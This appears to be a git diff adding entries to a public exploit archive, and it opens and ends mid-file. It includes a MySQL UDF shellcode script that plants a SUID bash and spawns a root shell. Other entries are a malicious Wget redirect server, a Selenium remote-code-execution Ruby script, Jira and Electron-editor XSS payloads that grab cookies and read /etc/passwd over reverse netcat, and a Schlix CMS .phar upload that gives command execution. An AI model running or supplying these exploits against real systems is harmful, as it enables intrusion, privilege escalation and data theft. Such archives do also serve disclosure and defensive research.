0800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000";
+
+shellcode = shellcode_x32
+if (platform.architecture()[0] == '64bit'):
+ shellcode = shellcode_x64
+
+# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root
+# username='root'
+# password=''
+
+###
+#if len(sys.argv) != 2:
+# print "Usage: %s " % argv[0]
+
+#username=sys.argv[1];
+#password=sys.argv[2];
+###
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
+parser.add_argument('--password', '-p', help='MySQL password', type=str)
+
+args = parser.parse_args()
+
+username=args.username
+password=args.password
+
+if not password:
+ password=''
+
+cmd='mysql -u root -p\'' + password + '\' -e "select @@plugin_dir \G"'
+plugin_str = subprocess.check_output(cmd, shell=True)
+plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str)
+res = bool(plugin_dir)
+
+if not res:
+ print("Error: could not locate the plugin directory")
+ os.exit(1);
+
+plugin_dir_ = plugin_dir.group(1)
+
+print("Plugin dir is %s" % plugin_dir_)
+
+# file to save the udf so file to
+udf_filename = 'udf' + str(random.randint(1000,10000)) + '.so'
+udf_outfile = plugin_dir_ + udf_filename
+
+# alternative way:
+# set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir;
+
+print("Trying to create a udf library...");
+os.system('mysql -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'%s\' \G"' % udf_outfile)
+res = os.path.isfile(udf_outfile)
+
+if not res:
+ print("Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile)
+ os.exit(1);
+
+print("UDF library created successfully: %s" % udf_outfile);
+print("Trying to create sys_exec...")
+os.system('mysql -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\'\G"' % udf_filename)
+
+print("Checking if sys_exec was created...")
+cmd='mysql -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"';
+res = subprocess.check_output(cmd, shell=True);
+
+if (res == ''):
+ print("sys_exec was not found (good luck next time!)")
+
+if res:
+ print("sys_exec was found: %s" % res)
+ print("Generating a SUID binary in /var/www/bash...")
+ os.system('mysql -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/bash /var/www/bash && chmod +s /var/www/bash\')"')
+
+ print("Trying to spawn a root shell...")
+ os.system("cd /var/www && ./bash -p")
\ No newline at end of file
diff --git a/exploits/linux/local/50465.c b/exploits/linux/local/50465.c
new file mode 100644
index 000000000..190e87e65
--- /dev/null
+++ b/exploits/linux/local/50465.c
@@ -0,0 +1,57 @@
+# Exploit Title: Mini-XML 3.2 - Heap Overflow
+# Google Dork: mxml Mini-xml Mini-XML
+# Date: 2020.10.19
+# Exploit Author: LIWEI
+# Vendor Homepage: https://www.msweet.org/mxml/
+# Software Link: https://github.com/michaelrsweet/mxml
+# Version: v3.2
+# Tested on: ubuntu 18.04.2
+
+# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".
+# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.
+# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.
+# 4.- Here are the crash backtrace.
+
+=================================================================
+==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
+READ of size 1 at 0x612000000a73 thread T0
+ #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
+ #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
+ #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
+ #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
+ #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
+ #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
+ #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
+ #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
+ #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
+#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
+
+
+# 6.- Here are my testcase.
+
+#include
+#include
+#include
+#include "mxml.h"
+
+extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
+std::string c(reinterpret_cast(data), size);
+char *ptr;
+
+mxml_node_t *tree;
+
+tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);
+
+if(tree){
+
+ ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
+
+ if(!ptr) assert(false);
+
+ mxmlDelete(tree);
+
+}
+
+return 0;
+
+}
\ No newline at end of file
diff --git a/exploits/linux/remote/49815.py b/exploits/linux/remote/49815.py
new file mode 100755
index 000000000..4c734776d
--- /dev/null
+++ b/exploits/linux/remote/49815.py
@@ -0,0 +1,54 @@
+# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
+# Original Exploit Author: Dawid Golunski
+# Exploit Author: liewehacksie
+# Version: GNU Wget < 1.18
+# CVE: CVE-2016-4971
+
+import http.server
+import socketserver
+import socket
+import sys
+
+class wgetExploit(http.server.SimpleHTTPRequestHandler):
+
+ def do_GET(self):
+ # This takes care of sending .wgetrc/.bash_profile/$file
+
+ print("We have a volunteer requesting " + self.path + " by GET :)\n")
+ if "Wget" not in self.headers.get('User-Agent'):
+ print("But it's not a Wget :( \n")
+ self.send_response(200)
+ self.end_headers()
+ self.wfile.write("Nothing to see here...")
+ return
+
+ self.send_response(301)
+ print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
+ new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
+
+ print("Sending redirect to %s \n"%(new_path))
+ self.send_header('Location', new_path)
+ self.end_headers()
+
+
+HTTP_LISTEN_IP = '192.168.72.2'
+HTTP_LISTEN_PORT = 80
+FTP_HOST = '192.168.72.4'
+FTP_PORT = 2121
+FILE = '.bash_profile'
+
+handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
+
+print("Ready? Is your FTP server running?")
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+result = sock.connect_ex((FTP_HOST, FTP_PORT))
+if result == 0:
+ print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
+else:
+ print("FTP is down :( Exiting.")
+ exit(1)
+
+print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
+
+handler.serve_forever()
\ No newline at end of file
diff --git a/exploits/linux/webapps/49915.rb b/exploits/linux/webapps/49915.rb
new file mode 100755
index 000000000..432420b20
--- /dev/null
+++ b/exploits/linux/webapps/49915.rb
@@ -0,0 +1,79 @@
+# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)
+# Date: 2021-05-27
+# Exploit Author: Jon Stratton
+# Vendor Homepage: https://www.selenium.dev/
+# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar
+# Version: 3.141.59
+# Tested on: Selenium Server 3.141.59, webdriver, geckodriver
+#
+# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb
+#
+# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started.
+#
+# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh”
+#
+# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system.
+#
+# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type.
+
+#!/usr/bin/env ruby
+
+require 'optparse'
+require 'net/http'
+require 'json'
+require 'uri'
+require 'zip'
+require 'base64'
+
+options = {}
+OptionParser.new do |opts|
+ opts.banner = 'Usage: example.rb [options]'
+ opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
+ options[:hub] = h
+ end
+ opts.on('--help', 'Prints this help') do
+ puts opts
+ exit
+ end
+end.parse!
+
+hub_url = options[:hub]
+
+payload = 'rm -rf $0
+echo success > /tmp/selenium_node_rce.txt'
+
+# Build profile zip file.
+stringio = Zip::OutputStream::write_buffer do |io|
+ # Create a handler for shell scripts
+ io.put_next_entry("handlers.json")
+ io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
+end
+stringio.rewind
+encoded_profile = Base64.strict_encode64(stringio.sysread)
+
+# Create session with our new profile
+newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}}
+
+uri = URI.parse(hub_url)
+http = Net::HTTP.new(uri.host, uri.port)
+
+# Start session with encoded_profile and save session id for cleanup.
+uri = URI.parse("%s/session" % [hub_url])
+request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
+request.body = JSON.generate(newSession)
+response = http.request(request)
+sessionId = JSON.parse(response.body)["value"]["sessionId"]
+
+# URL.
+data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)]
+uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId])
+request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
+request.body = JSON.generate(:url => data_url)
+response = http.request(request)
+
+# End session(not working)
+uri = URI.parse("%s/session/%s" % [hub_url, sessionId])
+request = Net::HTTP::Delete.new(uri.request_uri)
+http.request(request)
+
+exit
\ No newline at end of file
diff --git a/exploits/macos/webapps/50068.txt b/exploits/macos/webapps/50068.txt
new file mode 100644
index 000000000..9c0b234d8
--- /dev/null
+++ b/exploits/macos/webapps/50068.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
+# Date: 06/05/2021
+# Exploit Author: CAPTAIN_HOOK
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira/download/data-center
+# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
+# Tested on: ANY
+# CVE : CVE-2021-26078
+
+Description:
+
+The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability
+*Fixed versions:*
+
+ - 8.5.14
+ - 8.13.6
+ - 8.16.1
+ - 8.17.0
+
+POC:
+
+ - *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege
+user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22
+Your XSS Will be triggered immediately.
+
+Reference:
+https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49367.txt b/exploits/multiple/webapps/49367.txt
new file mode 100644
index 000000000..e6e20dc27
--- /dev/null
+++ b/exploits/multiple/webapps/49367.txt
@@ -0,0 +1,37 @@
+# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
+# Date: 30-12-2020
+# Exploit Author: Mesut Cetin
+# Vendor Homepage: http://egavilanmedia.com
+# Version: 1.0
+# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34
+
+Vulnerable parameter: email, gender, username
+Payload:
+
+Proof of Concept:
+
+To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:
+
+1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
+2. Click above right on the "Profile" tab
+3. Navigate to the "Edit Profile" tab
+4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
+5. Capture the POST request in Burp Suite and manipulate the parameter as shown:
+
+POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
+Host: demo.egavilanmedia.com
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 180
+Origin: http://demo.egavilanmedia.com
+Connection: close
+Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
+Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e
+
+fullname=admin&username=&email=&gender==&action=update_admin
+
+6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like , the session cookies can be send to the attacker.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49826.js b/exploits/multiple/webapps/49826.js
new file mode 100644
index 000000000..95afe07da
--- /dev/null
+++ b/exploits/multiple/webapps/49826.js
@@ -0,0 +1,29 @@
+# Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://github.com/jersou/markdown-explorer
+# Version: 0.1.1
+# Tested on: Windows, Linux, MacOs
+
+# Software Description:
+Easily explore, view and edit markdown documentation of a file tree.
+If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content.
+Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right.
+
+
+# Vulnerability Description:
+The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
+The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
+the remote attacker to get remote execution on the computer.
+
+
+#Proof
+https://imgur.com/a/w4bcPWs
+
+
+
+# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
+
+[](http://)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49827.js b/exploits/multiple/webapps/49827.js
new file mode 100644
index 000000000..8d1288489
--- /dev/null
+++ b/exploits/multiple/webapps/49827.js
@@ -0,0 +1,59 @@
+# Exploit Title: Xmind 2020 - XSS to RCE
+# Exploit Author: TaurusOmar
+# Date: May 4th, 2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://www.xmind.net/
+# Version: 2020
+# Tested on: Windows, Linux, MacOs
+
+# Software Description:
+XMind, a full-featured mind mapping and brainstorming tool, designed to generate ideas, inspire creativity, brings efficiency both in work and life. Millions and millions of WFH people love it.
+Many great products start with a small idea. Mind map can really be useful at the beginning of a project. Use it to record every idea in the meeting, you might be surprised by the difference and achievement it makes in the long run.
+
+
+# Vulnerability Description:
+The software allows you to store payloads in the form of files or as custom header titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks.
+The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
+the remote attacker to get remote execution on the computer.
+
+
+#Proof video
+https://imgur.com/a/t96Nxo5
+
+
+# Payload 2: exec(/etc/passwd)
+
+#Decode Payload
+
+
+#Encode Payload
+
+
+
+#Encode Payload
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49830.js b/exploits/multiple/webapps/49830.js
new file mode 100644
index 000000000..1e902dfa2
--- /dev/null
+++ b/exploits/multiple/webapps/49830.js
@@ -0,0 +1,28 @@
+# Exploit Title: Moeditor 0.2.0 - Persistent Cross-Site Scripting
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://moeditor.js.org/
+# Version: 0.2.0
+# Tested on: Windows, Linux, MacOs
+
+# Software Description:
+Software to view and edit sales documentation
+Moeditor shows the md files in its editor allows to carry out projects easily, you can open your own files or share with other users
+
+
+# Vulnerability Description:
+The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
+The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
+the remote attacker to get remote execution on the computer.
+
+
+#Proof video
+https://imgur.com/a/UdP4JaX
+
+
+
+# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
+
+[](http://)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49831.js b/exploits/multiple/webapps/49831.js
new file mode 100644
index 000000000..eb4543ea1
--- /dev/null
+++ b/exploits/multiple/webapps/49831.js
@@ -0,0 +1,28 @@
+# Exploit Title: Marky 0.0.1 - Persistent Cross-Site Scripting
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://github.com/vesparny/marky
+# Version: 0.0.1
+# Tested on: Linux, MacOs, Windows
+
+# Software Description:
+Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page.
+
+
+
+# Vulnerability Description:
+The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
+The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
+the remote attacker to get remote execution on the computer.
+
+
+#Proof Video
+https://imgur.com/a/qclfrUx
+
+
+
+# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
+
+[](http://)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49832.js b/exploits/multiple/webapps/49832.js
new file mode 100644
index 000000000..8d48df305
--- /dev/null
+++ b/exploits/multiple/webapps/49832.js
@@ -0,0 +1,27 @@
+# Exploit Title: StudyMD 0.3.2 - Persistent Cross-Site Scripting
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://github.com/jotron/StudyMD
+# Version: 0.3.2
+# Tested on: Windows, Linux, MacOs
+
+# Software Description:
+A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard.
+Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure.
+
+
+# Vulnerability Description:
+The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
+the remote attacker to get remote execution on the computer.
+
+
+#Proof Video
+https://imgur.com/a/lDHKEIp
+
+
+
+# Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc)
+
+[](http://)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49833.js b/exploits/multiple/webapps/49833.js
new file mode 100644
index 000000000..a3a16a9de
--- /dev/null
+++ b/exploits/multiple/webapps/49833.js
@@ -0,0 +1,27 @@
+# Exploit Title: Freeter 1.2.1 - Persistent Cross-Site Scripting
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://freeter.io/
+# Version: 1.2.1
+# Tested on: Windows, Linux, MacOs
+
+# Software Description:
+It is an organizer for design, it allows you to work on as many projects as you want. with project drop-down menu facilities to switch between them easily.
+integrates widgets to set up a dashboard, giving you quick access to everything you need to work on a project.
+
+
+# Vulnerability Description:
+The software allows you to store payloads in the form of files or as custom widget titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks.
+The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
+the remote attacker to get remote execution on the computer.
+
+
+#Proof Video
+https://imgur.com/a/iBuKWm4
+
+
+# Payload 2: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49834.js b/exploits/multiple/webapps/49834.js
new file mode 100644
index 000000000..85083d0a3
--- /dev/null
+++ b/exploits/multiple/webapps/49834.js
@@ -0,0 +1,26 @@
+# Exploit Title: Markright 1.0 - Persistent Cross-Site Scripting
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://github.com/dvcrn/markright
+# Version: 1.0
+# Tested on: Linux, MacOs,Windows
+
+# Software Description:
+A minimalist discount editor with github flavor, it allows to view, edit and load files with markdown extension (.md) quickly and with a friendly interface.
+
+
+# Vulnerability Description:
+The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
+the remote attacker to get remote execution on the computer.
+
+
+#Proof video
+https://imgur.com/a/VOsgKbZ
+
+
+
+# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
+
+[](http://)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49835.js b/exploits/multiple/webapps/49835.js
new file mode 100644
index 000000000..ca3b37592
--- /dev/null
+++ b/exploits/multiple/webapps/49835.js
@@ -0,0 +1,25 @@
+# Exploit Title: Markdownify 1.2.0 - Persistent Cross-Site Scripting
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://github.com/amitmerchant1990/electron-markdownify
+# Version: 1.2.0
+# Tested on: Windows, Linux, MacOs
+
+# Software Description:
+It is a lightweight editor for viewing and editing the markdown documentation of aYou can browse your personal folder to view and edit your files, change view / edit mode in md file with subject at the top.
+
+
+# Vulnerability Description:
+The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
+the remote attacker to get remote execution on the computer.
+
+
+#Proof
+https://imgur.com/a/T4jBoiS
+
+
+# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
+
+[](http://)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49836.js b/exploits/multiple/webapps/49836.js
new file mode 100644
index 000000000..a9a9916b6
--- /dev/null
+++ b/exploits/multiple/webapps/49836.js
@@ -0,0 +1,33 @@
+# Exploit Title: Anote 1.0 - Persistent Cross-Site Scripting
+# Exploit Author: TaurusOmar
+# Date: 04/05/2021
+# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+# Risk: High (8.8)
+# Vendor Homepage: https://github.com/AnotherNote/anote
+# Version: 1.0
+# Tested on: Linux, MacOs
+
+# Software Description:
+A simple opensource note app support markdown only, anote allows you to view and edit files markdown has a friendly interface for paste image paste html (includes retrieve image locally) export sale file with images
+export PDF support tray menu quick note (evernote inspired)
+cmd + v default will convert html.
+
+
+
+# Vulnerability Description:
+The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
+The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
+the remote attacker to get remote execution on the computer.
+
+
+#Proof Video
+https://imgur.com/a/mFMDOuu
+
+
+
+
+# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
+
+{"bookId":"ddpQIk8Fhmoyr2wK","available":true,"_id":"VDJCb2CaIHObFXlw","createdAt":{"$$date":1620076429201},"updatedAt":{"$$date":1620076529398},"title":"XSS TO RCE","content":"[](http://)"}
+{"$$indexCreated":{"fieldName":"updatedAt","unique":false,"sparse":false}}
+{"$$indexCreated":{"fieldName":"bookId","unique":false,"sparse":false}}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49897.txt b/exploits/multiple/webapps/49897.txt
new file mode 100644
index 000000000..ca14eb1b0
--- /dev/null
+++ b/exploits/multiple/webapps/49897.txt
@@ -0,0 +1,79 @@
+# Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE (Authenticated)
+# Date: 21.05.2021
+# Exploit Author: Emir Polat
+# Vendor Homepage: https://www.schlix.com/
+# Software Link: https://www.schlix.com/html/schlix-cms-downloads.html
+# Version: 2.2.6-6
+# Tested On: Ubuntu 20.04 (Firefox)
+
+############################################################################################################
+
+Summary: An authorized user can upload a file with a .phar extension
+to a path of his choice and control the content as he wishes. This causes RCE vulnerability.
+
+For full technical details and source code analysis:
+https://anatolias.medium.com/schlix-cms-v2-2-6-6-c17c5b2f29e.
+
+############################################################################################################
+
+PoC:
+
+1-) Login to admin panel with true credentials and go to "Tools ->
+Mediamanager" menu from left side.
+
+2-) Click the "Upload File" and upload a file and catch the request with Burp.
+
+3-) Change the "uploadstartpath", "filename" and file content as follows.
+
+# Request
+
+POST /schlix/admin/app/core.mediamanager?&ajax=1&action=upload HTTP/1.1
+Host: vulnerable-server
+Content-Length: 846
+X-Schlix-Ajax: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data;
+boundary=----WebKitFormBoundarybllOFLruz1WAs7K2
+Accept: */*
+Origin: http://
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: core-mediamanager_currentCategory=%2Fmedia%2Fpdf;
+schlix-your-cookie;__atuvc=5%7C20;
+schlix_frontendedit_control_showblock=-2;
+schlix_frontendedit_control_showhide=-2;
+schlix_frontendedit_control_showdoc=-2
+Connection: close
+
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="_csrftoken"
+
+{your_csrf_token}
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="uploadstartpath"
+
+/media/docs/....//....//....//....//system/images/avatars/large/
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="filedata[]"; filename="shell.phar"
+
+
+
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+2097152
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="filedata__total_file_size"
+
+0
+------WebKitFormBoundarybllOFLruz1WAs7K2
+Content-Disposition: form-data; name="filedata__max_file_count"
+
+20
+------WebKitFormBoundarybllOFLruz1WAs7K2--
+
+
+4-) Go to "vulnerable-server/schlix/system/images/avatars/large/shell.phar?rce=ls".
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50079.txt b/exploits/multiple/webapps/50079.txt
new file mode 100644
index 000000000..f0c612914
--- /dev/null
+++ b/exploits/multiple/webapps/50079.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
+# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
+# Date: 2021-06-18
+# Exploit Author: Stig Magnus Baugstø
+# Vendor Homepage: https://scratch.mit.edu/
+# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
+# Version: 3.10.2
+# Tested on: Windows 10 x64, but should be platform independent.
+# CVE: CVE-2020-7750
+
+Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
+
+CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
+
+You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
+
+
+
+
+The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
+
+Example of regular cross-site scripting (XSS):
+
+
+
+
+The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
+
